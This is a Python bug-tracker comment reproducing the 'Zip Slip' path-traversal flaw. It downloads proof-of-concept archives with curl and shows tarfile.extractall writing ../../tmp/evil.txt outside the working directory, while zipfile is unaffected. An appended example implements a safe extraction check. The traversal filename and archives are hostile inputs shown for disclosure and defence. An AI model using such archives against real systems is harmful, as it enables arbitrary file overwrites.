[issue35909] Zip Slip Vulnerability

Christian Heimes report at bugs.python.org
Wed Feb 6 05:32:47 EST 2019


Christian Heimes <lists at cheimes.de> added the comment:

You are both right and wrong. The zipfile module of Python 3.7 is fine, but the tarfile module is still vulnerable.

$ curl -O https://raw.githubusercontent.com/snyk/zip-slip-vulnerability/master/archives/zip-slip.zip
$ curl -O https://raw.githubusercontent.com/snyk/zip-slip-vulnerability/master/archives/zip-slip.tar
$ mkdir /tmp/zipslip
$ cd /tmp/zipslip

Test zipfile:

$ python3
>>> import zipfile
>>> zf = zipfile.ZipFile('zip-slip.zip')
>>> zf.printdir()
File Name                                             Modified             Size
good.txt                                       2018-04-15 22:04:30           19
../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../tmp/evil.txt 2018-04-15 22:04:42           20
>>> zf.extractall()
>>> exit()
$ find
.
./tmp
./tmp/evil.txt
./good.txt
./zip-slip.tar
./zip-slip.zip

Test tarfile:

$ rm -rf good.txt tmp/
$ python3
>>> import tarfile
>>> import tarfile
>>> tf = tarfile.TarFile('zip-slip.tar')
>>> tf.list()
?rw-r--r-- grander/staff         19 2018-04-15 19:04:29 good.txt 
?rw-r--r-- grander/staff         20 2018-06-03 13:49:05 ../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../tmp/evil.txt 
>>> tf.extractall()
# find
.
./zip-slip.tar
./good.txt
./zip-slip.zip
# cat /tmp/evil.txt 
this is an evil one

----------

_______________________________________
Python tracker <report at bugs.python.org>
<https://bugs.python.org/issue35909>
_______________________________________
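The report above shows `tarfile.extractall()` writing a member named `../../…/tmp/evil.txt` outside the working directory. As an added example (not code from the tracker issue or from CPython), the check below builds a constructed in-memory tar with the same shape, then extracts only members whose resolved path stays under the destination directory. The helper names (`is_within`, `safe_extractall`, `demo`) and the sample contents are assumptions made for this illustration.

```python
import io
import os
import tarfile
import tempfile

# Constructed sample: a benign member plus one whose name climbs out of the
# extraction directory, like the ../../tmp/evil.txt entry in the report.
SAMPLE_MEMBERS = (
    ("good.txt", b"this is a good one\n"),
    ("../" * 40 + "tmp/evil.txt", b"this is an evil one\n"),
)

def build_sample_tar() -> bytes:
    """Build the constructed archive in memory (nothing touches disk)."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tf:
        for name, payload in SAMPLE_MEMBERS:
            info = tarfile.TarInfo(name)
            info.size = len(payload)
            tf.addfile(info, io.BytesIO(payload))
    return buf.getvalue()

def is_within(base: str, target: str) -> bool:
    """True if target, after resolving '..' and symlinks, stays under base."""
    base = os.path.realpath(base)
    target = os.path.realpath(target)
    return os.path.commonpath([base, target]) == base

def safe_extractall(tar_bytes: bytes, dest: str):
    """Extract only regular files and directories whose resolved path stays
    inside dest. Returns (extracted_names, rejected_names)."""
    extracted, rejected = [], []
    with tarfile.open(fileobj=io.BytesIO(tar_bytes), mode="r") as tf:
        for m in tf.getmembers():
            target = os.path.join(dest, m.name)
            # Links are rejected outright: their linkname could escape as well.
            if not (m.isfile() or m.isdir()) or not is_within(dest, target):
                rejected.append(m.name)
                continue
            tf.extract(m, path=dest)  # Python 3.12+ also offers filter="data"
            extracted.append(m.name)
    return extracted, rejected

def demo():
    """Run the check on the constructed archive inside a fresh temp dir."""
    dest = tempfile.mkdtemp(prefix="zipslip-")
    extracted, rejected = safe_extractall(build_sample_tar(), dest)
    good_present = os.path.isfile(os.path.join(dest, "good.txt"))
    return extracted, rejected, good_present

if __name__ == "__main__":
    print(demo())
```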